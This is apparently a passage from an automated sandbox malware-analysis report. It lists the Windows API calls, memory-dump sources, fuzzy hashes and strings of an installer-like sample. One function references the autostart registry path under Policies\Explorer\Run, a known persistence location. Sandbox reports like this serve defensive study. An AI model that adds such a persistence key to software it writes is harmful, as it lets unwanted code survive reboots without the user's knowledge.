                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                              • String ID: $M$N
                                                                                                                                                                                                              • API String ID: 1638840714-813528018
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                                                                                                                                • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                                                                                                                              • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 004058B7
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00405912
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                              • String ID: (gD${
                                                                                                                                                                                                              • API String ID: 590372296-3503173740
                                                                                                                                                                                                              • Opcode ID: 9927c5c04afc45ce7243f23ce83da3be808d830e5e7dac2abc1f2713bef2e627
                                                                                                                                                                                                              • Instruction ID: c9c6b7b377eba0e4ba3b2f043119a7f49a951143ce35cdb84ba81c9eded025b4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9927c5c04afc45ce7243f23ce83da3be808d830e5e7dac2abc1f2713bef2e627
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9B16A71800608FFDB11AFA0DD89AAE7B79FB48314F10817AFA45B61A0DB744E51DF68
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                                                                                                                              • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                                                                                                                              • DestroyWindow.USER32 ref: 00403EF3
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00404147
                                                                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00446728,?,00446728,00000000), ref: 004041D4
                                                                                                                                                                                                              • SetWindowTextW.USER32(?,00446728), ref: 004041E8
                                                                                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                              • String ID: (gD
                                                                                                                                                                                                              • API String ID: 184305955-2450699939
                                                                                                                                                                                                              • Opcode ID: 48a7949b4d51a1ec232375b91bbbfbe9bb62f1b02b2dd2e3074461365575c3ec
                                                                                                                                                                                                              • Instruction ID: dffee297adc4390e0108bf821a76a55ee3af39d38e00891df0cde6976b1e4786
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48a7949b4d51a1ec232375b91bbbfbe9bb62f1b02b2dd2e3074461365575c3ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51C1B3B1540600EFDB216FA1EE85D2B3BA8EB85706F10053EFB41B11F1CB7998919B5E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                                                                                                                              • GetSysColor.USER32(?), ref: 004045FE
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                                                                                                                              • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 00404720
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • N, xrefs: 004046BA
                                                                                                                                                                                                              • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run, xrefs: 004046FB
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                              • String ID: N$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
                                                                                                                                                                                                              • API String ID: 3103080414-2660932049
                                                                                                                                                                                                              • Opcode ID: ee6812b55728e13701025233a8a1636c33168640e361f3cefbda46e1e37430c8
                                                                                                                                                                                                              • Instruction ID: 4cd1da19937af119875355adca30567c2743cec9092c6b5b68c8bc3b1ab06c36
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee6812b55728e13701025233a8a1636c33168640e361f3cefbda46e1e37430c8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 176181B1900209BFDB109F60DD85EAA7B69FB84354F00853AFB05B72E1DB789D51CB98
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                              • DrawTextW.USER32(00000000,00468240,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                              • String ID: F
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,00446728,00000000,?,?), ref: 004049B7
                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run), ref: 004049C3
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                                                                                                                                • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00002000,00404A0C), ref: 00405A45
                                                                                                                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                                                                                                                • Part of subcall function 0040667C: CharPrevW.USER32(?,?,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(004366F8,?,?,0000040F,?,004366F8,004366F8,?,00000001,004366F8,?,?,000003FB,?), ref: 00404A98
                                                                                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                                                                                                                                • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00446728,00446728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                                                                                                                • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                                                                                                                                • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00446728), ref: 00404CC9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                              • String ID: (gD$A$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(?,0045EDC8,00000400), ref: 00406078
                                                                                                                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(?,0045F5C8,00000400), ref: 00406095
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004060B3
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0045F5C8,C0000000,00000004,0045F5C8,?,?,?,?,?), ref: 004060EE
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,0045E9C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,004DD000,80000000,00000003), ref: 00405EE2
                                                                                                                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                              • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                                                                                                                              • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                                                                                                                              • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                                                                                                                              • GetSysColor.USER32(?), ref: 0040444C
                                                                                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00404476
                                                                                                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                                                                                              • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                                              • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenW.KERNEL32(0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00402F08,0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                              • lstrcatW.KERNEL32(0043E708,00402F08), ref: 004054AB
                                                                                                                                                                                                              • SetWindowTextW.USER32(0043E708,0043E708), ref: 004054BD
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2531174081-0
                                                                                                                                                                                                              • Opcode ID: d26779cd53d0e13026bfca991753509873890f78f21e0d47ba27efc3128bd531
                                                                                                                                                                                                              • Instruction ID: b152cc9d973ae9b63f3bddadd0b016ecede68a0b65af60167b2766ac6abf260a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d26779cd53d0e13026bfca991753509873890f78f21e0d47ba27efc3128bd531
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1721A171900518BADB119F96DD84ACFBFB5EF44314F10803AF904B22A1C7798A90CFA8
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00402EF5
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(0043E708,00402F08), ref: 004054AB
                                                                                                                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(0043E708,0043E708), ref: 004054BD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                                                                                                                                • Part of subcall function 00402E72: MulDiv.KERNEL32(00000000,00000064,0002E789), ref: 00402E87
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                                                                              • String ID: ... %d%%
                                                                                                                                                                                                              • API String ID: 722711167-2449383134
                                                                                                                                                                                                              • Opcode ID: 0fcb82c9706ea5302a04af69b33a80ab5dbc899856dcad255e9a620228d66a26
                                                                                                                                                                                                              • Instruction ID: 498445d7746695eb5746344947d7fa5b32a20b045a0bc4bf054171d5bd846382
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fcb82c9706ea5302a04af69b33a80ab5dbc899856dcad255e9a620228d66a26
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C901C4B0801614EBC7226B60FE4CA9B7B68BB00745B14013BF885F11E1CBB84855EFDE
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                                                                                                                              • GetMessagePos.USER32 ref: 00404D3D
                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                              • String ID: f
                                                                                                                                                                                                              • API String ID: 41195575-1993550816
